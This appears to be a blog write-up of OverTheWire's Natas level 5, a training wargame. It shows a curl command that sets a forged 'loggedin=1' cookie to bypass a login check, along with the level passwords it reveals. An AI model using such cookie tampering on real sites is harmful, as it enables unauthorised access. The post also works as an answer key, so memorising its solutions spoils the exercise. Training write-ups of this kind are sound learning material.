Home Natas [Level 5] - Overthewire
Post
Cancel

Natas [Level 5] - Overthewire

Username: natas5
Password: Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD
URL: http://natas5.natas.labs.overthewire.org

I can see we don’t have access to the webpage because we are not logged in.

So i have to bypass them with -b or --cookie with loggedin = 1 like as follow

1
curl -XGET -u natas5:Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD -b loggedin=1 http://natas5.natas.labs.overthewire.org

==> Results

1
<div id="content">Access granted. The password for natas6 is fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR</div>

Alright, i got the password! Moving on to level 6!

==> CTF: { natas6:fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR }

This post is licensed under CC BY 4.0 by the author.